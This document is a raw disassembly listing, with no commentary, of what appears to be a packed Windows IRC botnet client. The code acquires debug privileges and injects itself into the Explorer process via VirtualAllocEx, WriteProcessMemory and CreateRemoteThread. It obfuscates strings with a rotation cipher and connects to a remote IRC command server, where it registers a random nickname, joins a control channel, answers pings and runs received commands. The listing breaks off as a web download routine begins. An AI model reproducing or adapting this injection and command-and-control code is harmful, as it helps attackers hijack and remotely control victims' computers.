push offset loc_31005120
push eax
call sub_310037F8 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31005AF8
push eax
call sub_310037F8 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31005A7C
push eax
call sub_310037F8 ; memcpy
add esp, 40h
push offset loc_31005120
call sub_31003804 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset loc_31005120
push eax
call sub_310037F8 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31001AE3: ; CODE XREF: sub_31001651+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31001AE3
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_310037FE ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_310037FE ; memset
add esp, 18h
jmp loc_310018E8
; ---------------------------------------------------------------------------
loc_31001B37: ; CODE XREF: sub_31001651+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31005788
push eax
call sub_310037F8 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_310037F8 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_31005808
push eax
call sub_310037F8 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31001B8F: ; CODE XREF: sub_31001651+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31001B9C: ; CODE XREF: sub_31001651+1AD�j
; sub_31001651+1E1�j ...
push 2
push [ebp+var_4]
call dword_3100117C ; shutdown
loc_31001BA7: ; CODE XREF: sub_31001651+166�j
push [ebp+var_4]
call dword_31001194 ; closesocket
pop esi
loc_31001BB1: ; CODE XREF: sub_31001651+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31001651 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001BB8 proc near ; CODE XREF: UPX0:loc_31002E40�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_310010E0 ; LoadLibraryA
mov esi, dword_310010DC
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31001C3C
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31001C3C
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31001C3C
lea eax, [ebp+var_C]
push eax
push 20h
call dword_310010D8 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31001C3C: ; CODE XREF: sub_31001BB8+28�j
; sub_31001BB8+37�j ...
pop edi
pop esi
leave
retn
sub_31001BB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001C40 proc near ; CODE XREF: UPX0:31002E54�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_3100602C
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_310010EC ; GetModuleHandleA
mov esi, dword_310010DC
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31001C87
loc_31001C83: ; CODE XREF: sub_31001C40+54�j
push 1
jmp short loc_31001CD8
; ---------------------------------------------------------------------------
loc_31001C87: ; CODE XREF: sub_31001C40+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31001C83
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31001138 ; FindWindowA
test eax, eax
jnz short loc_31001CB5
call dword_31001134 ; GetForegroundWindow
test eax, eax
jnz short loc_31001CB5
push 2
jmp short loc_31001CD8
; ---------------------------------------------------------------------------
loc_31001CB5: ; CODE XREF: sub_31001C40+65�j
; sub_31001C40+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_3100113C ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_310010E8 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31001CDB
push 3
loc_31001CD8: ; CODE XREF: sub_31001C40+45�j
; sub_31001C40+73�j
pop eax
jmp short loc_31001D46
; ---------------------------------------------------------------------------
loc_31001CDB: ; CODE XREF: sub_31001C40+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_310010A4
test eax, eax
jz short loc_31001D39
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_310010E4 ; WriteProcessMemory
push ds:dword_31006000
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31001D25
push eax
call esi ; CloseHandle
jmp short loc_31001D40
; ---------------------------------------------------------------------------
loc_31001D25: ; CODE XREF: sub_31001C40+DE�j
push offset aUterm12 ; "uterm12"
call sub_31002AC6
pop ecx
mov [ebp+var_4], 5
jmp short loc_31001D40
; ---------------------------------------------------------------------------
loc_31001D39: ; CODE XREF: sub_31001C40+B2�j
mov [ebp+var_4], 4
loc_31001D40: ; CODE XREF: sub_31001C40+E3�j
; sub_31001C40+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31001D46: ; CODE XREF: sub_31001C40+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001D4B proc near ; CODE XREF: sub_31001DD0+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31001D7E
add ebx, 1Ah
loc_31001D7E: ; CODE XREF: sub_31001D4B+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31001118
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31001DA8
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31001DCB
; ---------------------------------------------------------------------------
loc_31001DA8: ; CODE XREF: sub_31001D4B+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31001DC8
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31001DCB
; ---------------------------------------------------------------------------
loc_31001DC8: ; CODE XREF: sub_31001D4B+68�j
mov al, [ebp+arg_0]
loc_31001DCB: ; CODE XREF: sub_31001D4B+5B�j
; sub_31001D4B+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001D4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001DD0 proc near ; CODE XREF: sub_3100277D+F7�p
; sub_3100277D+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31001E2B
mov edi, [ebp+arg_0]
push ebx
loc_31001DE5: ; CODE XREF: sub_31001DD0+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31001D4B
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31001E0F
cmp bl, 7Ah
jg short loc_31001E0F
movsx esi, bl
sub esi, 61h
loc_31001E0F: ; CODE XREF: sub_31001DD0+32�j
; sub_31001DD0+37�j
cmp bl, 41h
jl short loc_31001E1F
cmp bl, 5Ah
jg short loc_31001E1F
movsx esi, bl
sub esi, 41h
loc_31001E1F: ; CODE XREF: sub_31001DD0+42�j
; sub_31001DD0+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31001DE5
pop ebx
jmp short loc_31001E2E
; ---------------------------------------------------------------------------
loc_31001E2B: ; CODE XREF: sub_31001DD0+F�j
mov edi, [ebp+arg_0]
loc_31001E2E: ; CODE XREF: sub_31001DD0+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31001DD0 endp
; =============== S U B R O U T I N E =======================================
sub_31001E35 proc near ; CODE XREF: sub_31002463+66�p
push esi
mov esi, ecx
push 20001h
call sub_310037D2
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31001E35 endp
; =============== S U B R O U T I N E =======================================
sub_31001E4A proc near ; CODE XREF: sub_31002463+C6�p
; sub_31002463+119�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_310010B0 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31001E4A endp
; ---------------------------------------------------------------------------
loc_31001E68: ; CODE XREF: UPX0:3100388E�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_310037E6
push dword ptr [esi+2Ch]
call sub_310037E6
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31001E80 proc near ; CODE XREF: sub_31002463+E4�p
; sub_31002463+137�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_31001180 ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_31002B96
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31001184 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31001178 ; connect
test eax, eax
jnz loc_31002085
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31002085
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_310020C2
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31002B10
mov ebp, dword_31001130
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_310010D4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_310010D0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3100119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3100119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31002085
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31001FA9: ; CODE XREF: sub_31001E80+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_310020C2
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31001114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31002032
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31002B10
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3100119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31002085
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31001FA9
; ---------------------------------------------------------------------------
loc_31002032: ; CODE XREF: sub_31001E80+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3100119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31002093
loc_31002085: ; CODE XREF: sub_31001E80+4E�j
; sub_31001E80+6B�j ...
push dword ptr [esi+5Ch]
call dword_31001194 ; closesocket
push 1
pop eax
jmp short loc_310020B5
; ---------------------------------------------------------------------------
loc_31002093: ; CODE XREF: sub_31001E80+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_310020C2
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_310020B5: ; CODE XREF: sub_31001E80+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31001E80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310020C2 proc near ; CODE XREF: sub_31001E80+7C�p
; sub_31001E80+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31001114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3100213C
mov esi, dword_310010D0
lea edi, [eax+4]
push edi
call esi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_310020FB
push 1
pop eax
jmp short loc_3100213E
; ---------------------------------------------------------------------------
loc_310020FB: ; CODE XREF: sub_310020C2+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_310010B0 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_31001130 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3100119C ; send
loc_3100213C: ; CODE XREF: sub_310020C2+20�j
xor eax, eax
loc_3100213E: ; CODE XREF: sub_310020C2+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_310020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002145 proc near ; CODE XREF: sub_31002463+185�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_31001130 ; wsprintfA
mov edi, dword_310010D4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_310010D0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3100119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31001198 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3100220E
test eax, eax
jz short loc_3100220E
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_310020C2
mov edi, dword_31001114
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_310021E7
push 3
jmp short loc_31002210
; ---------------------------------------------------------------------------
loc_310021E7: ; CODE XREF: sub_31002145+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_310021FB
push 4
jmp short loc_31002210
; ---------------------------------------------------------------------------
loc_310021FB: ; CODE XREF: sub_31002145+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_310010B0 ; lstrcpynA
xor eax, eax
jmp short loc_31002211
; ---------------------------------------------------------------------------
loc_3100220E: ; CODE XREF: sub_31002145+74�j
; sub_31002145+78�j
push 2
loc_31002210: ; CODE XREF: sub_31002145+A0�j
; sub_31002145+B4�j
pop eax
loc_31002211: ; CODE XREF: sub_31002145+C7�j
pop edi
pop esi
leave
retn 4
sub_31002145 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002217 proc near ; CODE XREF: sub_31002280+83�p
; sub_31002463+1E1�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31001128 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31002B10
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_31001130 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_310010D0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3100119C ; send
push dword ptr [esi+5Ch]
call dword_31001194 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_31002217 endp
; =============== S U B R O U T I N E =======================================
sub_31002280 proc near ; CODE XREF: sub_31002463+1C9�p
mov eax, offset loc_3100387C
call sub_31003850
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_310010F0
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_310022BB: ; CODE XREF: sub_31002280+EF�j
call sub_31002C10
test eax, eax
jz short loc_31002308
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31001170 ; select
cmp eax, 0FFFFFFFFh
jz short loc_31002308
call sub_31002E68
test eax, eax
jz short loc_310022EC
push 1
call dword_310010BC ; ExitThread
loc_310022EC: ; CODE XREF: sub_31002280+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_3100231B
mov ecx, esi
call sub_31002217
loc_31002308: ; CODE XREF: sub_31002280+42�j
; sub_31002280+59�j ...
xor eax, eax
loc_3100230A: ; CODE XREF: sub_31002280+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_3100231B: ; CODE XREF: sub_31002280+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31002386
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_310010D4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_310020C2
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3100277D
cmp eax, ebx
jnz short loc_31002308
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31002C10
test eax, eax
jz short loc_31002308
push 64h
call dword_310010D4 ; Sleep
jmp loc_310022BB
; ---------------------------------------------------------------------------
loc_31002374: ; DATA XREF: UPX0:310038F4�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_31001194 ; closesocket
mov eax, offset loc_31002386
retn
; ---------------------------------------------------------------------------
loc_31002386: ; CODE XREF: sub_31002280+B2�j
; DATA XREF: sub_31002280+100�o
push 1
pop eax
jmp loc_3100230A
sub_31002280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100238E proc near ; CODE XREF: sub_3100277D+9C�p
; sub_3100277D+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_310010D0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlenA
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlenA
add ebx, eax
cmp ebx, 10Eh
jle short loc_310023BD
push 1
pop eax
jmp short loc_310023FE
; ---------------------------------------------------------------------------
loc_310023BD: ; CODE XREF: sub_3100238E+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_31001130 ; wsprintfA
add esp, 10h
push 64h
call dword_310010D4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3100119C ; send
xor eax, eax
loc_310023FE: ; CODE XREF: sub_3100238E+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_3100238E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002405 proc near ; CODE XREF: sub_31002463+7C�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push eax
call dword_310010A0 ; GetSystemTime
movzx eax, [ebp+var_10]
movzx ecx, [ebp+var_E]
lea eax, [eax+eax*2]
add eax, ecx
movzx ecx, [ebp+var_A]
add eax, ecx
push eax
call dword_31001108 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31002B10
push 8
push [ebp+arg_4]
call sub_31002B10
add esp, 14h
call dword_31001128 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_31002A98
leave
retn
sub_31002405 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_31002463 proc near ; DATA XREF: sub_31002E7C+E0�o
mov eax, offset loc_31003893
call sub_31003850
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov dword_31005FC8, ebx
call sub_31002A98
mov esi, dword_31001128
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31002B10
cmp ds:dword_3100603C, ebx
mov edi, dword_31001090
pop ecx
pop ecx
jz short loc_310024B8
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcatA
loc_310024B8: ; CODE XREF: sub_31002463+48�j
lea eax, [ebp-4Ch]
push offset a12 ; "12"
push eax
call edi ; lstrcatA
lea ecx, [ebp-2F4h]
call sub_31001E35
mov [ebp-4], ebx
loc_310024D1: ; CODE XREF: sub_31002463+1D5�j
; sub_31002463+1FB�j
push offset dword_31005FCC
lea eax, [ebp-18h]
push offset dword_31005FD0
push eax
call sub_31002405
add esp, 0Ch
loc_310024E7: ; CODE XREF: sub_31002463+98�j
call sub_31002C10
test eax, eax
jnz short loc_310024FD
push 3E8h
call dword_310010D4 ; Sleep
jmp short loc_310024E7
; ---------------------------------------------------------------------------
loc_310024FD: ; CODE XREF: sub_31002463+8B�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31002B10
pop ecx
xor edi, edi
pop ecx
loc_31002518: ; CODE XREF: sub_31002463+F1�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31005BC0
call sub_31001E4A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_310010D0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31001E80
test eax, eax
jz short loc_310025AB
inc edi
cmp edi, 8
jl short loc_31002518
xor edi, edi
loc_31002558: ; CODE XREF: sub_31002463+144�j
call sub_31002C10
test eax, eax
jz short loc_310025B9
push 1A0Bh
call esi ; rand
push 0Ch
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31005BC0[edx*4]
call sub_31001E4A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_310010D0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31001E80
test eax, eax
jz short loc_310025B6
inc edi
cmp edi, 30h
jb short loc_31002558
jmp short loc_310025B9
; ---------------------------------------------------------------------------
loc_310025AB: ; CODE XREF: sub_31002463+EB�j
push 1
pop ebx
mov dword_31005FC8, ebx
jmp short loc_310025C2
; ---------------------------------------------------------------------------
loc_310025B6: ; CODE XREF: sub_31002463+13E�j
push 1
pop ebx
loc_310025B9: ; CODE XREF: sub_31002463+FC�j
; sub_31002463+146�j
cmp dword_31005FC8, 0
jz short loc_310025D1
loc_310025C2: ; CODE XREF: sub_31002463+151�j
lea eax, [ebp-18h]
push offset aCccp ; "#cccp"
push eax
call dword_31001094 ; lstrcpyA
loc_310025D1: ; CODE XREF: sub_31002463+15D�j
test ebx, ebx
jz short loc_31002649
call sub_31002C10
test eax, eax
jz short loc_31002649
loc_310025DE: ; CODE XREF: sub_31002463+1A0�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_31002145
test eax, eax
jz short loc_31002605
push 3E8h
call dword_310010D4 ; Sleep
call sub_31002C10
test eax, eax
jnz short loc_310025DE
loc_31002605: ; CODE XREF: sub_31002463+18C�j
cmp dword_31005FC8, 0
jz short loc_31002615
mov edx, 0A8C0h
jmp short loc_31002625
; ---------------------------------------------------------------------------
loc_31002615: ; CODE XREF: sub_31002463+1A9�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_31002625: ; CODE XREF: sub_31002463+1B0�j
push edx
lea ecx, [ebp-2F4h]
call sub_31002280
call sub_31002C10
test eax, eax
jz loc_310024D1
lea ecx, [ebp-2F4h]
call sub_31002217
loc_31002649: ; CODE XREF: sub_31002463+170�j
; sub_31002463+179�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_310010D4 ; Sleep
jmp loc_310024D1
sub_31002463 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002663 proc near ; CODE XREF: sub_3100277D+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31001144 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_3100268E
push 1
jmp loc_31002724
; ---------------------------------------------------------------------------
